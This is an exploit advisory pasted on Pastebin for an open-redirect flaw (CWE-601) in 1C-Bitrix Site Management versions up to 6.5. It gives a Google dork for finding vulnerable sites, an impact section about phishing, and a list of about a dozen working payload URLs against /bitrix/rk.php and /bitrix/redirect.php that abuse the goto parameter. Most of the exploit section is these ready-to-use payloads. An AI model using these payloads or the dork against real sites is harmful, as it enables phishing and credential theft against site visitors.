Advertisement
KingSkrupellos

1C-Bitrix Site Management Russia 2.0 Open Redirection

Mar 4th, 2019
278
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.44 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : 1C-Bitrix Site Management Russia 2.0 Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 05/03/2019
  7. # Vendor Homepages : 1c-bitrix.ru ~ bitrix24.com
  8. # Software Information Link : 1c-bitrix.ru/support/
  9. dev.1c-bitrix.ru/support/forum/forum6/topic68319/
  10. dev.1c-bitrix.ru/community/forums/forum6/topic115703/
  11. dev.1c-bitrix.ru/api_help/main/functions/other/localredirect.php
  12. training.bitrix24.com/support/training/course/?COURSE_ID=
  13. 68&CHAPTER_ID=05937&LESSON_PATH=5936.5937
  14. # Software Affected Version : 2.0 - 6.5 and previous versions
  15. # Software Price Type : Paid Download
  16. # Tested On : Windows and Linux
  17. # Category : WebApps
  18. # Exploit Risk : High
  19. # Google Dorks : intext:Powered by Bitrix24. Copyright © 2002-2016 Bitrix
  20. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  21. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  22. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  23. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  24.  
  25. ####################################################################
  26.  
  27. # Description about Software :
  28. ***************************
  29. The product Bitrix Site Manager for Russian websites is a software core for the comprehensive
  30.  
  31. management of web projects of any complexity.
  32.  
  33. The product Bitrix24 is a ready-made product that enables the creation of the corporate
  34.  
  35. portal of a company with the possibility to customize standard functionality
  36.  
  37. according to a company’s needs.
  38.  
  39. ####################################################################
  40.  
  41. # Impact :
  42. *********
  43. This web application Bitrix Russia Site Management 2.0 accepts a user-controlled
  44.  
  45. input that specifies a link to an external site, and uses that link in a Redirect.
  46.  
  47. This simplifies phishing attacks. An http parameter may contain a URL value and could cause
  48.  
  49. the web application to redirect the request to the specified URL. By modifying the URL value
  50.  
  51. to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  52.  
  53. Because the server name in the modified link is identical to the original site, phishing attempts
  54.  
  55. have a more trustworthy appearance.
  56.  
  57. Open redirect is a failure in that process that makes it possible for attackers to
  58.  
  59. steer users to malicious websites. This vulnerability is used in phishing attacks to get users
  60.  
  61. to visit malicious sites without realizing it. Web users often encounter redirection when they
  62.  
  63. visit the Web site of a company whose name has been changed or which has been acquired
  64.  
  65. by another company. Visiting unreal web page user's computer becomes affected by malware
  66.  
  67. the task of which is to deceive the valid actor and steal his personal data.
  68. ______________________________________________________________________
  69.  
  70. Note : According to the Bitrix24 Company =>
  71.  
  72. rk.php - a file used by the Advertising module by default to record banner click events.
  73.  
  74. redirect.php - a file used by the Statistics module to record link click events.
  75.  
  76. More information you can find in this information link =>
  77.  
  78. training.bitrix24.com/support/training/course/?COURSE_ID=68&LESSON_ID=5945
  79.  
  80. ####################################################################
  81.  
  82. # Open Redirection Exploit :
  83. **************************
  84. /bitrix/rk.php?goto=https://www.[REDIRECTION-ADDRESS].gov
  85.  
  86. /bitrix/redirect.php?event1=&event2=&event3=&goto=https://www.[REDIRECTION-ADDRESS].gov
  87.  
  88. /bitrix/redirect.php?event3=352513&goto=https://www.[REDIRECTION-ADDRESS].gov
  89.  
  90. /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://www.[REDIRECTION-ADDRESS].gov
  91.  
  92. /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://www.[REDIRECTION-ADDRESS].gov
  93.  
  94. bitrix/redirect.php?event1=&event2=&event3=download&goto=https://www.[REDIRECTION-ADDRESS].gov
  95.  
  96. /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=
  97. click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F
  98. %D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0
  99. %B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81
  100. %D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB
  101. %D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://www.[REDIRECTION-ADDRESS].gov
  102.  
  103. /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+
  104. %5BMOBILE_HOME%5D+Love+Card&goto=https://www.[REDIRECTION-ADDRESS].gov
  105.  
  106. /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+
  107. %5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://www.[REDIRECTION-ADDRESS].gov
  108.  
  109. /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+
  110. %5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE
  111. %E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://www.[REDIRECTION-ADDRESS].gov
  112.  
  113. bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0
  114. %B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE
  115. %D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://www.[REDIRECTION-ADDRESS].gov
  116.  
  117. /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8
  118. %D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA
  119. %D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://www.[REDIRECTION-ADDRESS].gov
  120.  
  121. ####################################################################
  122.  
  123. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  124.  
  125. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement